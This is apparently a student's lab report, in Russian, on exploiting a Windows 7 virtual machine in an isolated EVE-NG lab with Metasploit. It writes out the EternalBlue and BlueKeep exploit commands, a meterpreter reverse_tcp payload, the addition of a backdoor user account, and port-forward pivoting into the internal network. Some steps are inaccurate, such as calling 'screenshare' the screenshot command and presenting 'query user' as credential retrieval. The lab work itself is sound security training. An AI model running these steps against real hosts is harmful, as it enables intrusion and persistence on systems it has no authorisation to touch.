<h1>Практическая работа №3. Эксплутация уязвимостей. MetaSplot Framework</h1> # Задание к практической работе №3 - Построить инфраструктуру в системе EVE-NG (есть возможность ее импортировать) - Настроить каждое устройство в соответсвии со следующими параметрами: - Kali-2021, Win-7, Win-10, Debian - получение адреса DHCP - На PfSense выполнить проброс с внешних 445/tcp и 3389/tcp портов на аналогичные порты win-7 виртуальной машины - Выполнить сканирование внешнего интерфейса межсетевого экрана с помощью nmap и Nessus с целью обнаружения уязвимых сервисов - Использую Metasploit Framework - получить доступ до Windows-7 виртуальной машины - Используя payload meterpreter: - выполнить создание нового пользователя - Выполнить скриншот рабочего стола - получить все учетные записи, находящиеся в памяти системы - Выполнить проксирование трафика во внутреннюю инфраструктуру <h2>Выполнение заданий</h2> - Построить инфраструктуру в системе EVE-NG (есть возможность ее импортировать): ![](https://i.imgur.com/vvWHrXi.png) - Настроить каждое устройство в соответсвии со следующими параметрами: - Kali-2021, Win-7, Win-10, Debian - получение адреса DHCP Kali-2021: Для просмотра сетевых настроек вводим команду `ip a`: ![](https://i.imgur.com/ZKqF0ij.png) Как видим, мы уже получили ip адрес на этой машине Debian: Точно также вводим `ip a`: Видим, что в этом случае мы не получили ip автоматически ![](https://i.imgur.com/JCG9AD2.png) Запрашиваем ip адрес от DHCP сервера (используя команду `dhclient`): ![](https://i.imgur.com/W4uSxJD.png) Windows 7: Аналогом `ip a` в windows системах служит команда `ipconfig` ![](https://i.imgur.com/haLXJAv.png) Windows 10: ![](https://i.imgur.com/B1Sn8LI.png) - На PfSense выполнить проброс с внешних 445/tcp и 3389/tcp портов на аналогичные порты win-7 виртуальной машины Добавляем форвардинг портов через Web интерфейс pfsence: ![](https://i.imgur.com/avIUvGa.png) - Выполнить сканирование внешнего интерфейса межсетевого экрана с помощью nmap и Nessus с целью обнаружения уязвимых сервисов С помощью утилиты `nmap` сканируем порты на pfsence: ![](https://i.imgur.com/oeKsaE3.png) - Использую Metasploit Framework - получить доступ до Windows-7 виртуальной машины Для начала перейдём в консоль Metasploit Framework с помощью команды `sudo msfconsole` Ищем подходящие эксплойты командой `search ms17-010` ![](https://i.imgur.com/QtKNAEY.png) Воспользуемся эксплойтом eternalblue, для этого вводим команду `use 0` Далее посмотрим параметры для этого эксплойта, используя команду `show options`: ![](https://i.imgur.com/zUYoIAl.png) Далее запустим эксплойт с помощью следующих команд ``` set forceexploit true set rhost 192.168.149.141 run ``` Видим, что данный эксплоит отработал ![](https://i.imgur.com/5P96Tho.png) - Используя payload meterpreter: - выполнить создание нового пользователя Проделаем следующие команды: ``` set rhost 192.168.149.141 set target 8 shell ``` Эксплойт выполнился, а теперь создадим нового пользователя на window машине: ``net user task eve@123 /add`` В панели управления видим нового пользователя: ![](https://i.imgur.com/xTw8jQR.png) - Выполнить скриншот рабочего стола В meterpreter вводим команду screenshare и получаем скриншот рабочего стола: ![](https://i.imgur.com/MRdGwkQ.png) - Получить все учетные записи, находящиеся в памяти системы Получить все учётные записи в памяти состемы можно также через shell, поэтому повторим предыдущие действия, добавив к ним команду `set payload windows/x64/meterpreter/reverse_tcp`, указав `shell` в meterpreter и введя команду ``query user``: ![](https://i.imgur.com/w8g7LnG.png) - Выполнить проксирование трафика во внутреннюю инфраструктуру Выполняем следующие команды в msfconsole: ``` search bluekeep use 1 set payload windows/x64/meterpreter/reverse_tcp set forceexploit true set target 8 set rhost 192.168.149.141 run ``` ![](https://i.imgur.com/aYnDvhB.png) Запускаем эксплойт командой `run`: ![](https://i.imgur.com/nth8QgN.png) Вводим команду: ``portfwd add -L 192.168.149.131 -l 1234 -p 443 -r 192.168.1.1`` ![](https://i.imgur.com/ZwH5qTf.png) Проверяем указанный в команде адрес на kali машине: ![](https://i.imgur.com/wsz9i3S.png)